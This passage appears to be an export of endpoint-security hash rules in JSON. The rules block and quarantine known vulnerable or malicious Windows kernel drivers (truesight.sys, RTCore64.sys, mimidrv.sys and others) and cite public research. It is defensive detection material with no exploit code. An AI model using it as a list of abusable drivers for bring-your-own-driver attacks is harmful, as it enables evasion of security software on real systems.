[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f27bb10d-c820-5cab-8145-7eba362fc54a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161164Z", + "creation_date": "2026-03-23T11:45:31.161166Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161172Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a17bee49182c0edc10ac25613f218cd761d0fca0e3bc73e2b61c79a4a52634a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f281084a-ccea-5845-8e2f-f5d6002bcaa3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832532Z", + "creation_date": "2026-03-23T11:45:30.832534Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832539Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f2cdd3226b9362cdf99626e0eef83dcbe977585f366edc81e96b95f80289c76", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f283d6e4-cfce-5da7-8875-d328a33dd1cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154674Z", + "creation_date": "2026-03-23T11:45:31.154676Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154681Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5663df0ac14cf5dd905000d4b233c397136f3123ecea3797ee0f05c5673b2fe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f29f0779-9865-5616-b0b6-f323e5cefa88", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487344Z", + "creation_date": "2026-03-23T11:45:31.487346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487351Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d7d52ae8481bf2ee43c8cf9f017587ee836f2834283c36e356142801175b5e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2ad3aec-d12e-5843-bd17-24482464ade9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141504Z", + "creation_date": "2026-03-23T11:45:31.141506Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141512Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "730660c0335ba73f2adcf2007ff6caea98d69bd9d90d321320b3b3e64eb3b296", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2bdbd17-0b58-5117-834d-8ed53914d0a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984372Z", + "creation_date": "2026-03-23T11:45:29.984374Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984380Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a88733b88cdc3f3cc040912ce5a3c44fa26f2ea8454cf6fc855b104a4910fa31", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2c8ec4c-638c-5b79-8f03-2c6954d9497b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161129Z", + "creation_date": "2026-03-23T11:45:31.161131Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161136Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9844610c40f241d1a856c4d81ba41904ae465cbf5bfa222a96c665274f0e42d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2e2c15e-cbbe-5255-9192-0507cb7e3d29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825079Z", + "creation_date": "2026-03-23T11:45:31.825082Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825091Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fcd0c16be348a880d27b7210383009cf79620916321a368e809277ca03680c01", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2f5affc-2719-5dec-9af8-f26c09dbe8a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607578Z", + "creation_date": "2026-03-23T11:45:29.607580Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be", + "comment": "Vulnerable Kernel Driver (aka Bs_Def.sys) [https://www.loldrivers.io/drivers/3ac0eda2-a844-4a9d-9cfa-c25a9e05d678/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2f665e3-f898-559a-a7d3-ed74160376f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.819515Z", + "creation_date": "2026-03-23T11:45:30.819517Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819523Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0fc0644085f956706ea892563309ba72f0986b7a3d4aa9ae81c1fa1c35e3e2d3", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2f6b286-6cd5-55f7-b8b5-d18062d1b7c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617396Z", + "creation_date": "2026-03-23T11:45:29.617398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617403Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c6c5e35accc37c928d721c800476ccf4c4b5b06a1b0906dc5ff4df71ff50943", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"f2ff97ad-ca65-59cf-9cad-89c044035620", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460708Z", + "creation_date": "2026-03-23T11:45:30.460711Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0dd3d43ab891777b11d4fdcb3b7f246b80bc66d12f7810cf268a5f6f4f8eb7b", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3023f78-c3d7-54b7-8000-bc4f9c0a1d0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615731Z", + "creation_date": "2026-03-23T11:45:29.615733Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615738Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61a3bf24d4e3eac56c380b022dfc195bad4cc8d03156cdc3ba743faab582284a", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f305977c-4376-5019-ac07-3acbffb88bd1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465311Z", + "creation_date": "2026-03-23T11:45:30.465314Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69866557566c59772f203c11f5fba30271448e231b65806a66e48f41e3804d7f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f30b5eb3-adad-5714-8676-93378ff9aacb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604167Z", + "creation_date": "2026-03-23T11:45:29.604170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604175Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5603b60137fed0dfcc95ec10563b0d5fa2e033944019ba5f338f7f7bd2aa45b", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f31d0834-3c43-53a2-abec-226f20be9117", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146203Z", + "creation_date": "2026-03-23T11:45:32.146206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146214Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a82a5b833cf03738f2d159e2912d2947f5216a4d2adf31a204f365d7ceab430", + "comment": "Malicious Kernel Driver (aka 2.sys) 
[https://www.loldrivers.io/drivers/bb1f80f3-d2fd-463e-9403-57c919bd976b/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f31d757d-9f37-5499-a216-54ca752268f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153666Z", + "creation_date": "2026-03-23T11:45:31.153668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153673Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "985e930812e841b4eb96dbf53451932109a90b875c7be4631c92383fce269447", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f330b0d6-e2f8-573a-8f06-15fab66995fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491679Z", + "creation_date": 
"2026-03-23T11:45:31.491682Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e688dcd34052f0b04222d1c0d024225f842e5d2529bc2876f4be51b49fd0f06", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3311e5e-43be-5b8d-957b-96050f09505a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613030Z", + "creation_date": "2026-03-23T11:45:29.613032Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613037Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d", + "comment": "Hilscher cifX Device Driver abuse (aka Physmem.sys) [https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f33acf16-b08c-5137-b09f-e54ce6e3d779", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610741Z", + "creation_date": "2026-03-23T11:45:29.610743Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610748Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bac709c49ddee363c8e59e515f2f632324a0359e932b7d8cb1ce2d52a95981aa", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3455a32-c6f4-5d0d-9d8f-ab192a9db134", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983421Z", + "creation_date": "2026-03-23T11:45:29.983423Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "630d7bdc20f33e6f822f52533a324865694886b7b74dfaad1dc30c9aee4260a2", + "comment": "Vulnerable Kernel Driver (aka My.sys) [https://www.loldrivers.io/drivers/b7ec29c6-e151-4a9f-a293-e61f04ee6489/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3503be4-8609-5925-a9bd-ed45559c8262", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972543Z", + "creation_date": "2026-03-23T11:45:29.972545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972550Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a6212f3b68a6f263e96420b3607b31cfdfe51afff516f3c87d27bf8a89721e8", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f35ae36a-1300-55f7-977d-5dca164c6cce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", 
+ "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611235Z", + "creation_date": "2026-03-23T11:45:29.611237Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611243Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1c71a98e10105faa0814fec3544474d86ae0e8f88efd77798a716adad3994a2", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f35b8166-c1b7-5d95-825d-7ed52ea9ba84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829414Z", + "creation_date": "2026-03-23T11:45:31.829417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829423Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
